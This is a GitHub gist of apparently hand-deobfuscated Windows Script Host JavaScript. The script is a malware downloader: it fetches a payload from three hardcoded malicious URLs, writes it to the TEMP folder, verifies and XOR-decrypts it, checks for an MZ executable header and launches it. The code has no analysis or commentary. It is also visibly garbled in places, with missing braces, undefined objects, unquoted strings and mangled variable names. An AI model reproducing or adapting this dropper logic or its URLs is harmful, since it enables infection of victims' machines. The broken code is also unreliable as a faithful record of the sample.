Skip to content

Instantly share code, notes, and snippets.

@levisre

levisre/js_deobfuscated.js

Last active July 14, 2016 09:02
Show Gist options
  • Save levisre/bbfdcedaf77b5b069726020203d63043 to your computer and use it in GitHub Desktop.
Save levisre/bbfdcedaf77b5b069726020203d63043 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
js_deobfuscated.js
var keyBuffer = ("112" + "313" + "2","VVVVVVVVVVVVVVVVVVVVVV"); // VVVVV + VVVV + VV + VVVVV + VV + VVVV);
var keybufferLen = keyBuffer.length;
var keybuffer2 = "VVVVVVVVVVVVVVVVVVVVV"; //VVVVV + VV + VV + VV + VVVVV + VV + VV + V;
var keybuffer2Len = keybuffer2.length; // keybuffer2[leng + th];
var keybuffer3 = ("asfasdfasfd", "VVVVV"); // (asfas + dfasf + d, VVVVV);
var keybuffer3Len = keybuffer3.length; //keybuffer3[leng + th];
var LUj = 1;
var adTypeText = 2;
var malURL = ["http://sirimba.com.br/qiovtl","http://zakagimebel.ru/krcsvf","http://repair-service.london/uywgi7v"];
var wsShell = WScript.CreateObject(WScript.Shell);
var envStr = wsShell.ExpandEnvironmentStrings(%TEMP%);
var fileName = envStr + "0ttyR" + "4ET9B" + "xiI";
var fullFileName =fileName + ".exe";
var dropedName = "%TEMP%/0ttyR4ET9BxiI.exe";
var listProtocol = ["WinHttp.WinHttpRequest.5.1", "MSXML2.XMLHTTP"];
for(var i=0;i<listProtocol.length;i++)
{
try {
var objHttpReq = WScript.CreateObject(listProtocol[i]);
}
catch(exception)
{
continue;
}
};
var _true = 1;
var urlIndex = 0;
do {
try {
if (1 == _true) {
if(urlIndex>=malURL.length)
{
urlIndex=0;
WScript.Sleep(1000);
objHttpReq.open("GET",malURL[urlIndex++ % malURL.length],false);
objHttpReq.send();
}
if (objHttpReq.readystate<4)
{
WScript.Sleep(100);
continue;
}
objADODBStream.open();
objADODBStream.type = 1;
objADODBStream.write(objHttpReq.ResponseBody]);
objADODBStream.position = 0;
//objADODBStream["Sa" + "veT" + "oF" + "ile"](dropedFile, 2);
objADODBStream.SaveToFile(dropedFile,2);
//objADODBStream[clos + e]();
objADODBStream.close();
var decryptObj = decrypt(dropedFile);
decryptObj = doDecrypt(decryptObj);
if (decryptObjdFile.length < 100 * 1024 || (decryptObj.length > 230 * 1024 || !isMZ(decryptObj))) {
_true = 1;
continue;
saveFile(fullFileName, decryptObj);
wsShell.Run(fullFileName + " 3" +" 21");
break;
} catch (exception) {
WScript.Sleep(1000);
continue;
};
} while (_true);
WSCript.Quit(0);
function doDecrypt(o) {
var expected;
var actual = o[o.length-4] | o[o.length-3] << 8 | o[o.length-2] << 16 | o[o.length-1] <<24;
o.split(decryptObj.length-4, 4);
expected = keybufferLen;
var m = 0;
for(;m< o.length;m++)
{
expected = (expected + o[m]) % 0x100000000;
}
if (expected != actual)
{
return []
};
getKey2Len = keybuffer2Len;
o = o.reverse();
m = 0;
for (;m < o.length;m++)
o[m] ^= getKey2Len;
getKey2Len = (getKey2Len + keybuffer3Len) % 256;
}
return o;
};
function isMZ(input) {
if (input[0] == 77 && input[1] == 90) { //0x4D and 0x5A <-- MZ Header
return true;
} else {
return false;
}
};
function decrypt(badge) {
var owner = WScript.CreateObject("ADODB.Stream");
owner.type = adTypeText;
owner.Charset = "437"; //CP437
owner.open();
owner.LoadFromFile(badge);
var unlock = owner.ReadText();
owner.close();
return getBuffer(unlock);
};
function getBuffer(input) {
var arrBuf = new Array();
arrBuf[0xC7] = 0x80;
arrBuf[0xFC] = 0x81;
arrBuf[0xE9] = 0x82;
arrBuf[0xE2] = 0x83;
arrBuf[0xE4] = 0x84;
arrBuf[0xE0] = 0x85;
arrBuf[0xE5] = 0x86;
arrBuf[0xE7] = 0x87;
arrBuf[0xEA] = 0x88;
arrBuf[0xEB] = 0x89;
arrBuf[0xE8] = 0x8A;
arrBuf[0xEF] = 0x8B;
arrBuf[0xEE] = 0x8C;
arrBuf[0xEC] = 0x8D;
arrBuf[0xC4] = 0x8E;
arrBuf[0xC5] = 0x8F;
arrBuf[0xC9] = 0x90;
arrBuf[0xE6] = 0x91;
arrBuf[0xC6] = 0x92;
arrBuf[0xF4] = 0x93;
arrBuf[0xF6] = 0x94;
arrBuf[0xF2] = 0x95;
arrBuf[0xFB] = 0x96;
arrBuf[0xF9] = 0x97;
arrBuf[0xFF] = 0x98;
arrBuf[0xD6] = 0x99;
arrBuf[0xDC] = 0x9A;
arrBuf[0xA2] = 0x9B;
arrBuf[0xA3] = 0x9C;
arrBuf[0xA5] = 0x9D;
arrBuf[0x20A7] = 0x9E;
arrBuf[0x192] = 0x9F;
arrBuf[0xE1] = 0xA0;
arrBuf[0xED] = 0xA1;
arrBuf[0xF3] = 0xA2;
arrBuf[0xFA] = 0xA3;
arrBuf[0xF1] = 0xA4;
arrBuf[0xD1] = 0xA5;
arrBuf[0xAA] = 0xA6;
arrBuf[0xBA] = 0xA7;
arrBuf[0xBF] = 0xA8;
arrBuf[0x2310] = 0xA9;
arrBuf[0xAC] = 0xAA;
arrBuf[0xBD] = 0xAB;
arrBuf[0xBC] = 0xAC;
arrBuf[0xA1] = 0xAD;
arrBuf[0xAB] = 0xAE;
arrBuf[0xBB] = 0xAF;
arrBuf[0x2591] = 0xB0;
arrBuf[0x2592] = 0xB1;
arrBuf[0x2593] = 0xB2;
arrBuf[0x2502] = 0xB3;
arrBuf[0x2524] = 0xB4;
arrBuf[0x2561] = 0xB5;
arrBuf[0x2562] = 0xB6;
arrBuf[0x2556] = 0xB7;
arrBuf[0x2555] = 0xB8;
arrBuf[0x2563] = 0xB9;
arrBuf[0x2551] = 0xBA;
arrBuf[0x2557] = 0xBB;
arrBuf[0x255D] = 0xBC;
arrBuf[0x255C] = 0xBD;
arrBuf[0x255B] = 0xBE;
arrBuf[0x2510] = 0xBF;
arrBuf[0x2514] = 0xC0;
arrBuf[0x2534] = 0xC1;
arrBuf[0x252C] = 0xC2;
arrBuf[0x251C] = 0xC3;
arrBuf[0x2500] = 0xC4;
arrBuf[0x253C] = 0xC5;
arrBuf[0x255E] = 0xC6;
arrBuf[0x255F] = 0xC7;
arrBuf[0x255A] = 0xC8;
arrBuf[0x2554] = 0xC9;
arrBuf[0x2569] = 0xCA;
arrBuf[0x2566] = 0xCB;
arrBuf[0x2560] = 0xCC;
arrBuf[0x2550] = 0xCD;
arrBuf[0x256C] = 0xCE;
arrBuf[0x2567] = 0xCF;
arrBuf[0x2568] = 0xD0;
arrBuf[0x2564] = 0xD1;
arrBuf[0x2565] = 0xD2;
arrBuf[0x2559] = 0xD3;
arrBuf[0x2558] = 0xD4;
arrBuf[0x2552] = 0xD5;
arrBuf[0x2553] = 0xD6;
arrBuf[0x256B] = 0xD7;
arrBuf[0x256A] = 0xD8;
arrBuf[0x2518] = 0xD9;
arrBuf[0x250C] = 0xDA;
arrBuf[0x2588] = 0xDB;
arrBuf[0x2584] = 0xDC;
arrBuf[0x258C] = 0xDD;
arrBuf[0x2590] = 0xDE;
arrBuf[0x2580] = 0xDF;
arrBuf[0x3B1] = 0xE0;
arrBuf[0xDF] = 0xE1;
arrBuf[0x393] = 0xE2;
arrBuf[0x3C0] = 0xE3;
arrBuf[0x3A3] = 0xE4;
arrBuf[0x3C3] = 0xE5;
arrBuf[0xB5] = 0xE6;
arrBuf[0x3C4] = 0xE7;
arrBuf[0x3A6] = 0xE8;
arrBuf[0x398] = 0xE9;
arrBuf[0x3A9] = 0xEA;
arrBuf[0x3B4] = 0xEB;
arrBuf[0x221E] = 0xEC;
arrBuf[0x3C6] = 0xED;
arrBuf[0x3B5] = 0xEE;
arrBuf[0x2229] = 0xEF;
arrBuf[0x2261] = 0xF0;
arrBuf[0xB1] = 0xF1;
arrBuf[0x2265] = 0xF2;
arrBuf[0x2264] = 0xF3;
arrBuf[0x2320] = 0xF4;
arrBuf[0x2321] = 0xF5;
arrBuf[0xF7] = 0xF6;
arrBuf[0x2248] = 0xF7;
arrBuf[0xB0] = 0xF8;
arrBuf[0x2219] = 0xF9;
arrBuf[0xB7] = 0xFA;
arrBuf[0x221A] = 0xFB;
arrBuf[0x207F] = 0xFC;
arrBuf[0xB2] = 0xFD;
arrBuf[0x25A0] = 0xFE;
arrBuf[0xA0] = 0xFF;
var output = new Array();
var dep = 0;
for (;dep < input.length;dep++) {
var i = input.charCodeAt(dep);
if (i < 128) {
var x = i
} else {
x = arrBuf[i];
}
output.push(x);
}
return output;
}
function manipulateData(data) {
var done = new Array();
done[0x80] = 0x00C7;
done[0x81] = 0x00FC;
done[0x82] = 0x00E9;
done[0x83] = 0x00E2;
done[0x84] = 0x00E4;
done[0x85] = 0x00E0;
done[0x86] = 0x00E5;
done[0x87] = 0x00E7;
done[0x88] = 0x00EA;
done[0x89] = 0x00EB;
done[0x8A] = 0x00E8;
done[0x8B] = 0x00EF;
done[0x8C] = 0x00EE;
done[0x8D] = 0x00EC;
done[0x8E] = 0x00C4;
done[0x8F] = 0x00C5;
done[0x90] = 0x00C9;
done[0x91] = 0x00E6;
done[0x92] = 0x00C6;
done[0x93] = 0x00F4;
done[0x94] = 0x00F6;
done[0x95] = 0x00F2;
done[0x96] = 0x00FB;
done[0x97] = 0x00F9;
done[0x98] = 0x00FF;
done[0x99] = 0x00D6;
done[0x9A] = 0x00DC;
done[0x9B] = 0x00A2;
done[0x9C] = 0x00A3;
done[0x9D] = 0x00A5;
done[0x9E] = 0x20A7;
done[0x9F] = 0x0192;
done[0xA0] = 0x00E1;
done[0xA1] = 0x00ED;
done[0xA2] = 0x00F3;
done[0xA3] = 0x00FA;
done[0xA4] = 0x00F1;
done[0xA5] = 0x00D1;
done[0xA6] = 0x00AA;
done[0xA7] = 0x00BA;
done[0xA8] = 0x00BF;
done[0xA9] = 0x2310;
done[0xAA] = 0x00AC;
done[0xAB] = 0x00BD;
done[0xAC] = 0x00BC;
done[0xAD] = 0x00A1;
done[0xAE] = 0x00AB;
done[0xAF] = 0x00BB;
done[0xB0] = 0x2591;
done[0xB1] = 0x2592;
done[0xB2] = 0x2593;
done[0xB3] = 0x2502;
done[0xB4] = 0x2524;
done[0xB5] = 0x2561;
done[0xB6] = 0x2562;
done[0xB7] = 0x2556;
done[0xB8] = 0x2555;
done[0xB9] = 0x2563;
done[0xBA] = 0x2551;
done[0xBB] = 0x2557;
done[0xBC] = 0x255D;
done[0xBD] = 0x255C;
done[0xBE] = 0x255B;
done[0xBF] = 0x2510;
done[0xC0] = 0x2514;
done[0xC1] = 0x2534;
done[0xC2] = 0x252C;
done[0xC3] = 0x251C;
done[0xC4] = 0x2500;
done[0xC5] = 0x253C;
done[0xC6] = 0x255E;
done[0xC7] = 0x255F;
done[0xC8] = 0x255A;
done[0xC9] = 0x2554;
done[0xCA] = 0x2569;
done[0xCB] = 0x2566;
done[0xCC] = 0x2560;
done[0xCD] = 0x2550;
done[0xCE] = 0x256C;
done[0xCF] = 0x2567;
done[0xD0] = 0x2568;
done[0xD1] = 0x2564;
done[0xD2] = 0x2565;
done[0xD3] = 0x2559;
done[0xD4] = 0x2558;
done[0xD5] = 0x2552;
done[0xD6] = 0x2553;
done[0xD7] = 0x256B;
done[0xD8] = 0x256A;
done[0xD9] = 0x2518;
done[0xDA] = 0x250C;
done[0xDB] = 0x2588;
done[0xDC] = 0x2584;
done[0xDD] = 0x258C;
done[0xDE] = 0x2590;
done[0xDF] = 0x2580;
done[0xE0] = 0x03B1;
done[0xE1] = 0x00DF;
done[0xE2] = 0x0393;
done[0xE3] = 0x03C0;
done[0xE4] = 0x03A3;
done[0xE5] = 0x03C3;
done[0xE6] = 0x00B5;
done[0xE7] = 0x03C4;
done[0xE8] = 0x03A6;
done[0xE9] = 0x0398;
done[0xEA] = 0x03A9;
done[0xEB] = 0x03B4;
done[0xEC] = 0x221E;
done[0xED] = 0x03C6;
done[0xEE] = 0x03B5;
done[0xEF] = 0x2229;
done[0xF0] = 0x2261;
done[0xF1] = 0x00B1;
done[0xF2] = 0x2265;
done[0xF3] = 0x2264;
done[0xF4] = 0x2320;
done[0xF5] = 0x2321;
done[0xF6] = 0x00F7;
done[0xF7] = 0x2248;
done[0xF8] = 0x00B0;
done[0xF9] = 0x2219;
done[0xFA] = 0x00B7;
done[0xFB] = 0x221A;
done[0xFC] = 0x207F;
done[0xFD] = 0x00B2;
done[0xFE] = 0x25A0;
done[0xFF] = 0x00A0;
var rulesets = new Array();
var tagName = "";
var id;
var paths;
var idProp = 0;
for (;idProp < data.length;idProp++) {
id = data[idProp];
if (id < 128) {
paths = id;
} else {
paths = done[id];
}
rulesets.push(String.fromCharCode(paths));
}
tagName = rulesets.join("");
return tagName;
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment